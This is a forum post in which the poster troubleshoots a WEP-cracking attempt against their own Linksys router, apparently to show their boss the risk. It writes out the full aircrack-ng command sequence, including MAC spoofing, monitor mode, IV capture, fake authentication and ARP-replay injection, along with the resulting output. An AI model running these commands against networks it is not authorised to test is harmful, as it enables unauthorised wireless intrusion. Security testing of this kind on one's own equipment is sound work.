Problem Injecting IVs using BT4 and Asus WL-138GE
Iím trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.
I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and Iím having a problem injecting IVs. These are the commands Iím running:
- This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface Iím looking for.
- Interface wlan0 with driver ďb43 Ė [phy0]Ē is reporting monitor mode disabled.
airmon-ng stop wlan0
- Spoofs the MAC to an Intel corporation. I use this because Iíve read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55
macchanger --mac 00:02:B3:EC:EE:F2 wlan0
- This enables monitor mode on mon0 which is my monitoring interface
airmon-ng start wlan0
- Gives me a list of all access points. My Linksys shows up here.
- Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access pointís MAC.
airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
At this point I open a new konsole and leave the other one to log.
- Attempts to authenticate/associate with the router. I get the following message when this is run:
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
- Sending Authentication Request (Open system) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association successful :-) (AID: 1)
- This command should start injecting IVs and my #Data should be going up in my logging screen but it isnít. This is what I get:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packetsÖ(0 pps)
At this point Iíve read that this command could also work:
- It only says Read xxx packets and my #Data does not increase
Aireplay-ng -2 Ėp 0841 Ėc FF:FF:FF:FF:FF:FF Ėb xx:xx:xx:xx:xx:xx Ėh 00:02:B3:EC:EE:F2 wlan0
If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isnít working so I tried the following:
- It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.
Aireplay-ng -9 wlan0
Iíve been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I havenít come across anything thatís helped me. If anyone has any suggestions please post away. Thanks.